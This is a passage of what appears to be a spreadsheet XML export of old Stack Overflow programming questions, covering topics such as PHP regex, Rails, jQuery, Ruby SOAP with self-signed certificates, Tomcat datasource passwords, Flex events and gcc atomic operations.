&lt;pre&gt;&lt;code&gt;$pattern[0] = "/\&amp;lt;description\&amp;gt;(.*?)\&amp;lt;\/description\&amp;gt;/is";
$replace[0] = '&amp;lt;description&amp;gt;'.htmlentities("$1").'&amp;lt;/description&amp;gt;';
$rawFeed = preg_replace($pattern, $replace, $rawFeed);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you have a more elegant solution to this as well, please share. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reverse-projection 2D points into 3D</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose we have a 3d Space with a plane on it with an arbitary equation : ax+by+cz+d=0
now suppose that we pick 3 random points on that plane: (x0,y0,z0) (x1,y1,z1) (x1,y1,z1)&lt;/p&gt;
&lt;p&gt;now i have a different point of view(camera) for this plane. i mean i have a different camera that will look at this plane from a different point of view. From that camera point of view these points have different locations. for example (x0,y0,z0) will be (x0',y0')
and (x1,y1,z1) will be (x1',y1') and (x2,y2,z2) will be (x2',y2') from the new camera point of view.&lt;/p&gt;
&lt;p&gt;So here is my a little hard question! I want to pick a point for example (X,Y) from the new camera point of view and tell where it will be on that plane. All i know is that 3 points and their locations on 3d space and their projection locations on the new camera view.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Do you know the coefficients of the plane-equation and the camera positions (along with the projection), or do you only have the six points?  - Nils&lt;/p&gt;
&lt;p&gt;i know the location of first 3 points. therefore we can calculate the coefficients of the plane. so we know exactly where the plane is from (0,0,0) point of view. and then we have the camera that can only see the points! So the only thing that camera sees is 3 points and also it knows their locations in 3d space (and for sure their locations on 2d camera view plane). and after all i want to look at camera view, pick a point (for example (x1,y1)) and tell where is that point on that plane. (for sure this (X,Y,Z) point should fit on the plane equation). Also i know nothing about the camera location.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Practices for reusing code between controllers in Ruby on Rails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some controller methods I'd like to share. What is the best practice for doing this in ruby on rails? Should I create an abstract class that my controllers extend, or should I create module and add it in to each controller? Below are the controller methods I want to share:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def driving_directions
  @address_to = params[:address_to]
  @address_from = params[:address_from]
  @map_center = params[:map_center_start]
  # if we were not given a center point to start our map on
  # let's create one.
  if !@map_center &amp;amp;&amp;amp; @address_to
    @map_center = GeoKit::Geocoders::MultiGeocoder.geocode(@address_to).ll
  elsif !@map_center &amp;amp;&amp;amp; @address_from
    @map_center = GeoKit::Geocoders::MultiGeocoder.geocode(@address_from).ll
  end
end
def printer_friendly
  starting_point = params[:starting_point].split(',').collect{|e|e.to_f}
  ne = params[:ne].split(',').collect{|e|e.to_f}
  sw = params[:sw].split(',').collect{|e|e.to_f}
  size = params[:size].split(',').collect{|e|e.to_f}
  address = params[:address]
  @markers = retrieve_points(ne,sw,size,false)
  @map = initialize_map([[sw[0],sw[1]],[ne[0],ne[1]]],[starting_point[0],starting_point[1]],false,@markers,true)
  @address_string = address
end
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I write a working IThumbnailProvider for Windows Vista</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have written a thumbnail provider following the interfaces specified on MSDN.  However, I have been unable to figure out how to register it in a way that Vista actually calls into it.  Has anyone gotten a thumbnail provider working for Vista?  Sample code or links would be especially helpful.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recovering browser textareas</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to recover the contents of a browser textarea? Say, you've typed a long post and then accidentally clicked on a link. Then when you come back, the textfields tantalizingly retain the text you typed in, but the textarea is blank. Where does IE and Firefox store the stuff that prepopulates? Can textareas be brought back? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>When do I use the PHP constant "PHP_EOL"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When is it a good idea to use &lt;a href="http://us3.php.net/manual/en/reserved.constants.php"&gt;&lt;code&gt;PHP_EOL&lt;/code&gt;&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;I sometimes see this in code samples of PHP. Does this handle DOS/Mac/Unix endline issues?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem POSTing to webservice in .net 3.5 solution</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm at my wit's end here. I'm trying to use an auto-complete extender from the asp.net ajax extensions toolkit, which is filled from a bog-standard webservice. The application is a .net 3.5 web site, hosting the webservice in a subdirectory (real, not virtual).&lt;/p&gt;
&lt;p&gt;Whenever I try to post to the webservice I get the following error: 
&lt;b&gt;The HTTP verb POST used to access path '/Workarea/webservices/FindAdvisorNameService.asmx/FindAdvisorName' is not allowed.&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;To complicate matters, a co-worker of mine pulled down the solution and can run it fine. &lt;/p&gt;
&lt;p&gt;After doing some Googling, it seems that there are some issues with URL rewriting, so I had him try using my web.config -- he still has no problem, and I still have no success.&lt;/p&gt;
&lt;p&gt;Anyone have any thoughts on what could be up, or where to start looking?&lt;/p&gt;
&lt;p&gt;To complicate matters, this is an &lt;a href="http://www.ektron.com" rel="nofollow"&gt;Ektron CMS400.Net&lt;/a&gt; solution, but he has the same version of Ektron installed that I do. The project was recently upgraded from the 2.0 to 3.5 framework, but still, it's in 3.5 on his machine as well.&lt;/p&gt;
&lt;p&gt;I've checked the IIS mappings, and GET, POST, and DEBUG are allowed on ASMX files.&lt;/p&gt;
&lt;p&gt;Help me Obi-Wan KeSObi, you're my only hope!&lt;/p&gt;
&lt;p&gt;Edit: Oh, yeah, to complicate matters, this is a brand new machine I have, so there's not likely to be that much weird stuff in the registry, etc. etc.. The co-worker's machine is almost as new.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parsing XML with namespaces using jQuery $().find</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to get the contents of a XML document element, but the element has a colon in it's name.&lt;/p&gt;
&lt;p&gt;This line works for every element but the ones with a colon in the name:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(this).find("geo:lat").text();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I assume that the colon needs escaping. How do I fix this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make Ruby's SOAP::RPC::Driver work with self signed certificates?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I prevent this exception when making a soap call to a server that is using a self signed certificate?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;require "rubygems"
gem "httpclient", "2.1.2"
require 'http-access2'
require 'soap/rpc/driver'
client = SOAP::RPC::Driver.new( url, 'http://removed' )
client.options[ 'protocol.http.ssl_config.verify_mode' ] = OpenSSL::SSL::VERIFY_NONE
client.options[ 'protocol.http.basic_auth' ] &amp;lt;&amp;lt; [ url, user, pass ]
at depth 0 - 18: self signed certificate
/opt/local/lib/ruby/1.8/soap/streamHandler.rb:200:in `send_post': 415:  (SOAP::HTTPStreamError)
    from /opt/local/lib/ruby/1.8/soap/streamHandler.rb:109:in `send'
    from /opt/local/lib/ruby/1.8/soap/rpc/proxy.rb:170:in `route'
    from /opt/local/lib/ruby/1.8/soap/rpc/proxy.rb:141:in `call'
    from /opt/local/lib/ruby/1.8/soap/rpc/driver.rb:178:in `call'
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Best tool for Software System Diagramming</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Over the years, I have tried many times to find a good, easy to use, cross platform tool for some basic software system diagramming.  The UML tools I have tried seemed to get in my way more than help.  So far, the solution I keep returning to is Visio, which is both Windows-only and expensive.  Although its far from ideal, it does provide some basic building block and allows things like grid placement and zooming.  I wanted to see if there is a great tool out there that I'm just missing that fits at least some of the criteria mentioned.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL sp_help_operator</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone know what group I need to belong to show up in the sp_help_operator list?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Who uses a digital notepad for saving UML and other diagrams?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I often find that for an initial design document, I just want to lob in a couple of rough UML / other diagrams. &lt;/p&gt;
&lt;p&gt;Most diagramming tools, even Visio, slow me down considerably. I admit that this is probably &lt;a href="http://en.wikipedia.org/wiki/PEBKAC" rel="nofollow"&gt;PEBCAK&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I usually end up drawing a sketch, and then running it through a scanner.&lt;/p&gt;
&lt;p&gt;I was wondering who uses a digital notepad, and would they recommend it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Absolute URL from base + relative URL in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a base URL :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://my.server.com/folder/directory/sample
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And a relative one :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;../../other/path
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How to get the absolute URL from this ? It's pretty straighforward using string manipulation, but I would like to do this in a secure way, using the &lt;code&gt;Uri&lt;/code&gt; class or something similar.&lt;/p&gt;
&lt;p&gt;It's for a standard a C# app, not an ASP.NET one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When should I use Debug.Assert()?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been a professional software engineer for about a year now, having graduated with a CS degree. I've known about assertions for a while in C++ and C, but had no idea they existed in C# and .NET at all until recently.&lt;/p&gt;
&lt;p&gt;Our production code contains no asserts whatsoever and my question is this...&lt;/p&gt;
&lt;p&gt;Should I begin using Asserts in our production code? And if so, When is its use most appropriate? Would it make more sense to do&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Debug.Assert(val != null);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if ( val == null )
    throw new exception();
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to avoid storing passwords in the clear for tomcat's server.xml Resource definition of a DataSource?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The resource definition in tomcat's &lt;code&gt;server.xml&lt;/code&gt; looks something like this...&lt;/p&gt;
&lt;pre class="lang-xml prettyprint-override"&gt;&lt;code&gt;&amp;lt;Resource
    name="jdbc/tox"
    scope="Shareable"
    type="javax.sql.DataSource"
    url="jdbc:oracle:thin:@yourDBserver.yourCompany.com:1521:yourDBsid"
    driverClassName="oracle.jdbc.pool.OracleDataSource"
    username="tox"
    password="toxbaby"
    maxIdle="3"
    maxActive="10"
    removeAbandoned="true"
    removeAbandonedTimeout="60"
    testOnBorrow="true"
    validationQuery="select * from dual"
    logAbandoned="true"
    debug="99"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The password is in the clear.  How to avoid this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What browser features/plugins for opera, IE, firefox, chrome, safari, etc. do you use for browser compatibility testing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use the &lt;a href="https://addons.mozilla.org/en-US/firefox/addon/6543" rel="nofollow"&gt;Nightly Tester Tools&lt;/a&gt; for Firefox and &lt;a href="http://fiddlertool.com/fiddler/" rel="nofollow"&gt;Fiddler&lt;/a&gt; for IE. What do you use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make a custom Flex component for a gap-fill exercise?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The purpose of this component is to test knowledge of a student on a given subject - in the example below it would be geography. The student is given a piece of text with missing words in it. He/she has to fill in (type in this case) the missing words - hence this kind of test/exercise is called gap-fill.There could be several sentences in the exercise with multiple gaps - something that looks like this:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;*London is the ______&lt;/strong&gt; and largest urban area in the &lt;strong&gt;_________&lt;/strong&gt;. An important settlement for two millennia, London's history goes back to its founding by the &lt;strong&gt;_______&lt;/strong&gt;.***&lt;/p&gt;
&lt;p&gt;The component must be able to display text with 'floating' gaps within the text. These gaps would have similar behaviour to TextInput control. Once the student submits the answer the component will return the words that were typed in and these are then compared against the expected answers. &lt;/p&gt;
&lt;p&gt;The component should be able to display the text and the gaps dynamically derive all required parameters from the text. The position of the gaps could be marked by a special token - such as #10# - which would mark the position of the gap within the text and the size of the gap (number of characters).&lt;/p&gt;
&lt;p&gt;Therefore the above text could look like this before being loaded into the component:&lt;/p&gt;
&lt;p&gt;London is the #10# and largest urban area in the #15#. An important settlement for two millennia, London's history goes back to its founding by the #8#.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing in parameter from html element with jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working with jQuery for the first time and need some help. I have html that looks like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id='comment-8' class='comment'&amp;gt;
    &amp;lt;p&amp;gt;Blah blah&amp;lt;/p&amp;gt;
    &amp;lt;div class='tools'&amp;gt;&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;div id='comment-9' class='comment'&amp;gt;
    &amp;lt;p&amp;gt;Blah blah something else&amp;lt;/p&amp;gt;
    &amp;lt;div class='tools'&amp;gt;&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm trying to use jQuery to add spans to the .tools divs that call variouis functions when clicked. The functions needs to receive the id (either the entire 'comment-8' or just the '8' part) of the parent comment so I can then show a form or other information about the comment.&lt;/p&gt;
&lt;p&gt;What I have thus far is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type='text/javascript'&amp;gt;
    $(function() {
        var actionSpan = $('&amp;lt;span&amp;gt;[Do Something]&amp;lt;/span&amp;gt;');
        actionSpan.bind('click', doSomething);
        $('.tools').append(actionSpan);
     });
     function doSomething(commentId) { alert(commentId); }
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm stuck on how to populate the commentId parameter for doSomething. Perhaps instead of the id, I should be passing in a reference to the span that was clicked. That would probably be fine as well, but I'm unsure of how to accomplish that.&lt;/p&gt;
&lt;p&gt;Thanks,
Brian&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it a bad idea to reload routes dynamically in Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application I'm writing where I'm allowing the administrators to add aliases for pages, categories, etc, and I would like to use a different controller/action depending on the alias (without redirecting, and I've found that render doesn't actually call the method. I just renders the template). I have tried a catch all route, but I'm not crazy about causing and catching a DoubleRender exception that gets thrown everytime.&lt;/p&gt;
&lt;p&gt;The solution for this I've come up with is dynamically generated routes when the server is started, and using callbacks from the Alias model to reload routes when an alias is created/updated/destroyed. 
Here is the code from my routes.rb:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Alias.find(:all).each do |alias_to_add|
	map.connect alias_to_add.name, 
			:controller =&amp;gt; alias_to_add.page_type.controller, 
			:action =&amp;gt; alias_to_add.page_type.action,
			:navigation_node_id =&amp;gt; alias_to_add.navigation_node.id
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am using callbacks in my Alias model as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;after_save :rebuild_routes
after_destroy :rebuild_routes
def rebuild_routes
	ActionController::Routing::Routes.reload!
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this against Rails best practices? Is there a better solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sql server real datatype, what is the C# equivalent?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the C# equivalent to the sql server 2005 real type?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# + Castle ActiveRecord: HasAndBelongsToMany and collections</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have many-to-many relationship (using the ActiveRecord attribute HasAndBelongsToMany) between Posts and Tags (domain object names changed to protect the innocent), and I wanted a method like &lt;pre&gt;FindAllPostByTags(IList&amp;lt;Tag&amp;gt; tags)&lt;/pre&gt; that returns all Posts that have all (not just some of) the Tags in the parameter. Any way I could accomplish this either with NHibernate Expressions or HQL? I've searched through the HQL documentation and couldn't find anything that suited my needs. I hope I'm just missing something obvious!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any good collection module in perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone suggest a good module in perl which can be used to store collection of objects?&lt;/p&gt;
&lt;p&gt;Or is ARRAY a good enough substitute for most of the needs?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;
I am looking for a collections class because I want to be able to do an operation like compute collection level property from each element.&lt;/p&gt;
&lt;p&gt;Since I need to perform many such operations, I might as well write a class which can be extended by individual objects. This class will obviously work with arrays (or may be hashes).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I find out what category a product belongs to?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Basically, when a user inputs a product name (such as "iPhone 3g"), I would like to know the parent categories of that item (such as Electronics / Mobile phones). Is there a web api (ie. for ebay, amazon etc.) or any other way to figure out that information?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pass NSMutableArray object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm getting lost in pointer land, I believe.  I've got this (code syntax might be a little off, I am not looking at the machine with this code on it...but all the pertinent details are correct):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NSMutableArray *tmp = [[NSMutableArray alloc] init];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I them pass that to a routine in another class&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (BOOL)myRoutine: (NSMutableArray *)inArray
{
    // Adds items to the array -- if I break at the end of this function, the inArray variable has a count of 10
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But when the code comes back into the calling routine, [tmp count] is 0.&lt;/p&gt;
&lt;p&gt;I must be missing something very simple and yet very fundamental, but for the life of me I can't see it.  Can anyone point out what I'm doing wrong?&lt;/p&gt;
&lt;p&gt;EDIT: www.stray-bits.com asked if I have retained a reference to it, and I said "maybe...we tried this:  NSMutableArray *tmp = [[[NSMutableArray alloc] init] retain]; not sure if that is what you mean, or if I did it right.&lt;/p&gt;
&lt;p&gt;EDIT2:  Mike McMaster and Andy -- you guys are probably right, then.  I don't have the code here (it's on a colleague's machine and they have left for the day), but to fill the array with values we were doing something along the lines of using a decoder(?) object.  &lt;/p&gt;
&lt;p&gt;The purpose of this function is to open a file from the iPhone, read that file into an array (it's an array of objects that we saved in a previous run of the program).  That "decoder" thing has a method that puts data into the array.  &lt;/p&gt;
&lt;p&gt;Man, I've totally butchered this.  I really hope you all can follow, and thanks for the advice.  We'll look more closely at it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you sign your Firefox extensions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have developed a couple of extensions for Firefox, and am annoyed that it is so hard to get the extension signed.  When an extension isn't signed, it says "Author not verified" when it is installed, and to me that just looks wrong.&lt;/p&gt;
&lt;p&gt;I have a simple build script that builds my .xpi file from sources, and I have a licenced copy of PKZip (which according to a number of tutorials is required to build a signed xpi file that Firefox requires), but I haven't found a way to get a free/cheap certificate that actually works or a set of instructions that do the trick.&lt;/p&gt;
&lt;p&gt;Since my extensions are free, I don't want to spend $400 on a commercial certificate, but I don't mind spending $50 or so to get it done.  I have both Linux and Windows machines, although my build script currently uses Windows and that would be most convenient to use.&lt;/p&gt;
&lt;p&gt;How have you solved this?  What do I need to do to automatically and securely sign my extensions when they are built?&lt;/p&gt;
&lt;p&gt;Edit: I appreciate the Google hits, but the steps they provide aren't complete enough on how to actually get a certificate that works.  The feeling I get reminds me of this classic:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.sciencecartoonsplus.com/images/miracle3.gif" alt="alt text" title="Then a miracle occurs..." /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dropdownlist control with &lt;optgroup&gt;s for asp.net (webforms)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone recommend a dropdownlist control for asp.net (3.5) that can render option groups? Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Starteam 2005 COM API</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone worked with the StarTeam COM API (Specifically, intergrating with C#).&lt;/p&gt;
&lt;p&gt;I need to write a helper function that returns a directory structure out of Starteam, but all I've been able to retrieve using this API has been a list of views.&lt;/p&gt;
&lt;p&gt;Has anyone else tried this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a free/pay web service that I can query to get MLS data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given an &lt;a href="http://en.wikipedia.org/wiki/Multiple_Listing_Service"&gt;MLS&lt;/a&gt;#, I'd like to get an XML document with details about the listing, like address, price and such. Not a NAR or CREA member. Mostly interested in North American rental property listing data.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I use a generated variable name in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a bunch a values I would like to add together which are entered into a form. Right now, the form has 11 lines but it could get larger in the future. I can easily add all the values together with something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$total = $value1 + $value2 + ... + $value11;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All the values I want to add together are coming from an &lt;code&gt;HTML&lt;/code&gt; form. I want to avoid javascript.&lt;/p&gt;
&lt;p&gt;But, I want to avoid having to manually do it, especially if it grows much larger. This is my attempt at adding all the values together using a loop but it returns an "undefined variable" error (it is just some test code to try out the idea):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
$tempTotal = 0;
$pBalance1 = 5;
$pBalance2 = 5;
$pBalance3 = 5;
for  ($i = 1 ; $i &amp;lt;= 3 ; $i++){
    $tempTotal = $tempTotal + $pBalance.$i;
}
echo $tempTotal;
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is what I want to do possible in PHP?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Oracle load spikes couple hours after startup</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We use oracle as the back-end database for our product. I have been running series of stress tests on our system and I have started noticing that oracle is much faster right after the database was restarted. Over time (a couple hours or so) the database seems to get slower and slower and I will see the database machine under more stress.&lt;/p&gt;
&lt;p&gt;Running the test right after an oracle restart, i will see a 1 min load average of 5 or so and average CPU around 10-15%. After a few hours, I see the load average at 13 and CPU at 40-70%. (This is red hat linux 2x Quad core xeon, Raid 10 10k rpm sas drives).&lt;/p&gt;
&lt;p&gt;My first thought was wouldn't database transactions get faster because those queries are getting cached?&lt;/p&gt;
&lt;p&gt;I can't seem to figure out the problem. &lt;/p&gt;
&lt;p&gt;EDIT:
Turns out this was a problem on the connecting software side due to bad design. Every action on the system created a new insert, delete, and select. With all these unique queries being generated, what was cached was constantly changing. The spike I am talking about is when the query cache filled up.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Installshield, what is the best event to use to launch applications only on install, not on uninstall or repair?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have recently moved back to InstallShield 2008 from rolling our own install. So, I am still trying to get up the learning curve on it. &lt;/p&gt;
&lt;p&gt;We are using Firebird and a usb driver, that we couldn't find good msi install solutions. So, we have a cmd line to install firebird silently and the usb driver mostly silently.&lt;/p&gt;
&lt;p&gt;We have put this code into the event handler DefaultFeatureInstalled. This works really well on the first time install. But, when I do an uninstall it trys to launch the firebird installer again, so it must be sending the DefaultFeatureInstalled event again.&lt;/p&gt;
&lt;p&gt;Is their another event to use, or is there a way to detect whether its an install or uninstall in the DefaultFeatureInstalled event?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a reasonable way to implement a cd command on VMS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to be able to say things like&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;cd [.fred]&lt;/strong&gt; and have my default directory go there, 
and my prompt change to indicate the full path to my current location.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex: Why can't I handle certain events?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In certain cases, I can't seem to get components to receive events.&lt;/p&gt;
&lt;p&gt;[edit] &lt;/p&gt;
&lt;p&gt;To clarify, the example code is just for demonstration sake, what I was really asking was if there was a central location that a listener could be added, to which one can reliably dispatch events to and from arbitrary objects.&lt;/p&gt;
&lt;p&gt;I ended up using parentApplication to dispatch and receive the event I needed to handle.&lt;/p&gt;
&lt;p&gt;[/edit]&lt;/p&gt;
&lt;p&gt;If two components have differing parents, or as in the example below, one is a popup, it would seem the event never reaches the listener (See the method "popUp" for the dispatch that doesn't work):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" 
        layout="absolute" 
        initialize="init()"&amp;gt;
&amp;lt;mx:Script&amp;gt;
	&amp;lt;![CDATA[
		import mx.controls.Menu;
		import mx.managers.PopUpManager;
		// Add listeners
		public function init():void
		{
			this.addEventListener("child", handleChild);
			this.addEventListener("stepchild", handleStepchild);
		}
		// Handle the no pop button event
		public function noPop(event:Event):void
		{
			dispatchEvent(new Event("child"));
		}
		// Handle the pop up
		public function popUp(event:Event):void
		{
			var menu:Menu = new Menu();
			var btnMenu:Button = new Button();
			btnMenu.label = "stepchild";
			menu.addChild(btnMenu);
			PopUpManager.addPopUp(menu, this);
			// neither of these work...
			this.callLater(btnMenu.dispatchEvent, [new Event("stepchild", true)]);
			btnMenu.dispatchEvent(new Event("stepchild", true));
		}
		// Event handlers
		public function handleChild(event:Event):void 
		{
			trace("I handled child");
		}
		public function handleStepchild(event:Event):void {
			trace("I handled stepchild");
		}
	]]&amp;gt;
&amp;lt;/mx:Script&amp;gt;
&amp;lt;mx:VBox&amp;gt;
	&amp;lt;mx:Button label="NoPop" id="btnNoPop" click="noPop(event)"/&amp;gt;
	&amp;lt;mx:Button label="PopUp" id="btnPop" click="popUp(event)"/&amp;gt;
&amp;lt;/mx:VBox&amp;gt;
&amp;lt;/mx:Application&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;I can think of work-arounds, but it seems like there ought to be some central event bus...&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;Am I missing something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to unit test immutable class constructors?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an immutable class with some private fields that are set during the constructor execution.  I want to unit test this constructor but I'm not sure the "best practice" in this case.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Simple Example&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This class is defined in Assembly1:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Class2Test
{
    private readonly string _StringProperty;
    public Class2Test()
    {
        _StringProperty = ConfigurationManager.AppSettings["stringProperty"];
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This class is defined in Assembly2:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[TestClass]
public class TestClass
{
    [TestMethod]
    public void Class2Test_Default_Constructor()
    {
        Class2Test x = new Class2Test();
        //what do I assert to validate that the field was set properly?
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;EDIT 1&lt;/strong&gt;: I have answered this question with a potential solution but I'm not sure if it's the "right way to go".  So if you think you have a better idea please post it.&lt;/p&gt;
&lt;p&gt;This example isn't really worth testing, but assume the constructor has some more complex logic.  Is the best approach to avoid testing the constructor and to just assume it works if all the tests for the methods on the class work?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT 2&lt;/strong&gt;:  Looks like I made the sample a little to simple.  I have updated it with a more reasonable situation.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Link error when compiling gcc atomic operation in 32-bit mode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following program:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;~/test&amp;gt; cat test.cc
int main()
{
  int i = 3;
  int j = __sync_add_and_fetch(&amp;amp;i, 1);
  return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm compiling this program using GCC 4.2.2 on Linux running on a multi-cpu 64-bit Intel machine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;~/test&amp;gt; uname --all
Linux doom 2.6.9-67.ELsmp #1 SMP Wed Nov 7 13:56:44 EST 2007 x86_64 x86_64 x86_64 GNU/Linux
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I compile the program in 64-bit mode, it compiles and links fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;~/test&amp;gt; /share/tools/gcc-4.2.2/bin/g++ test.cc
~/test&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I compile it in 32-bit mode, I get the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;~/test&amp;gt; /share/tools/gcc-4.2.2/bin/g++ -m32 test.cc
/tmp/ccEVHGkB.o(.text+0x27): In function `main':
: undefined reference to `__sync_add_and_fetch_4'
collect2: ld returned 1 exit status
~/test&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
